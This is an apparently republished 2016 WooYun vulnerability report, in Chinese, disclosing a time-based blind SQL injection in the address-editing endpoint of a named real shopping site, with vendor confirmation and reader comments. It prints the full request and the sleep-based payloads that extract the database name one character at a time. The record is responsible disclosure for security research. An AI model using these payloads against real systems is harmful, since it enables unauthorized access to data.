暴风影音某站SQL注入

admin 2017年4月20日17:20:39评论247 views字数 200阅读0分40秒阅读模式
摘要

2016-02-29: 细节已通知厂商并且等待厂商处理中
2016-02-29: 厂商已经确认,细节仅向厂商公开
2016-03-10: 细节向核心白帽子及相关领域专家公开
2016-03-20: 细节向普通白帽子公开
2016-03-30: 细节向实习白帽子公开
2016-04-14: 细节向公众公开

漏洞概要 关注数(6) 关注此漏洞

缺陷编号: WooYun-2016-179405

漏洞标题: 暴风影音某站SQL注入

相关厂商: 暴风影音

漏洞作者: 小川暴风影音某站SQL注入

提交时间: 2016-02-29 09:29

公开时间: 2016-04-14 18:27

漏洞类型: SQL注射漏洞

危害等级: 中

自评Rank: 8

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: php+数字类型注射

1人收藏


漏洞详情

披露状态:

2016-02-29: 细节已通知厂商并且等待厂商处理中
2016-02-29: 厂商已经确认,细节仅向厂商公开
2016-03-10: 细节向核心白帽子及相关领域专家公开
2016-03-20: 细节向普通白帽子公开
2016-03-30: 细节向实习白帽子公开
2016-04-14: 细节向公众公开

简要描述:

漏洞9

详细说明:

站点暴风魔镜:

http://www.mojing.cn/

在收货地址处的:

暴风影音某站SQL注入

漏洞证明:

参数:

address_id_e存在注入

id必须是自己账户的,所以下面的请求只有我的账户能测,自己验证的时候,用自己的id

http://www.mojing.cn/order/user/myaddressedit

address_link_province_id_e=110000&address_link_province_name_e=%E5%8C%97%E4%BA%AC%E5%B8%82&address_link_city_id_e=110200&address_link_city_name_e=%E5%8E%BF&address_link_area_id_e=110229&address_link_area_name_e=%E5%BB%B6%E5%BA%86%E5%8E%BF&address_link_name_e=wctest&address_link_mobile_e=13800138000&address_link_mobile_back_e=13800138001&address_link_detail_e=13800138000&address_id_e=38315 and 1=1 and sleep(4)&address_link_code_e=657444

address_id_e=38315 and 1=1 and sleep(4)

出现延迟

address_id_e=38315 and 1=2 and sleep(4)

不延迟。

偏偏是这么一个操蛋的功能,这玩意or 1=1,把收货地址全改了的话,就操蛋了。

盲注一下

address_id_e=38315 and length(database())=4 and sleep(4)

请求出现延迟,数据库长度为4

s

address_id_e=38315 and ascii(substr(database(),1,1))=115 and sleep(4)

h

address_id_e=38315 and ascii(substr(database(),2,1))=104 and sleep(4)

o

address_id_e=38315 and ascii(substr(database(),3,1))=111 and sleep(4)

p

address_id_e=38315 and ascii(substr(database(),4,1))=112 and sleep(4)

database()为shop

修复方案:

过滤

版权声明:转载请注明来源 小川@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2016-02-29 18:27

厂商回复:

感谢您提交的漏洞,我们会尽快修复。

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分


评价

  1. 2016-02-29 18:38 | null_z ( 普通白帽子 | Rank:1012 漏洞数:115 )

    2

    三天之内,就有个声音很萌的妹子找你送礼物

  2. 2016-02-29 18:42 | 小川 暴风影音某站SQL注入 ( 核心白帽子 | Rank:1627 漏洞数:241 | 一个致力要将乌云变成搞笑论坛的男人)

    2

    @null_z 然后聊10块钱的

  3. 2016-02-29 22:53 | niliu 暴风影音某站SQL注入 ( 核心白帽子 | Rank:1803 漏洞数:236 | 逆流而上)

    1

    我表示不信

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin